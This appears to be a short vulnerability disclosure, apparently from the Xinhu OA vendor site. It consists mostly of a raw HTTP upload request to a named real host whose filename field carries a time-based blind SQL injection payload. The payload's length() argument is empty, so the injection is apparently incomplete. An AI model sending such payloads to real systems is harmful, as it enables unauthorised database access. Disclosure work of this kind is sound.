隐患描述 :
post /index.php?a=upfile&m=uploaw|api&d=task http/1.1
host: oa.fzwgyxx.cn:83
x-requested-with: xmlhttprequest
content-type: multipart/form-data; boundary=----webkitformboundaryitxo7ncprwksqd9i
accept-language: zh-cn,zh;q=0.9,en;q=0.8,en-gb;q=0.7,en-us;q=0.6
accept-encoding: gzip, deflate
user-agent: mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/133.0.0.0 safari/537.36 edg/133.0.0.0
content-length: 219
------webkitformboundaryitxo7ncprwksqd9i
content-disposition: form-data; name="file"; filename="a',web=(if(sign(length( )) - 13) = 1, sleep(3), 0))-- .png"
123
------webkitformboundaryitxo7ncprwksqd9i--
[img,{fileurl}/img/58933.jpg,700]
[img,{fileurl}/img/58933.jpg,700]
原创文章,禁止转载复制,信呼OA官网保留一切知识产权。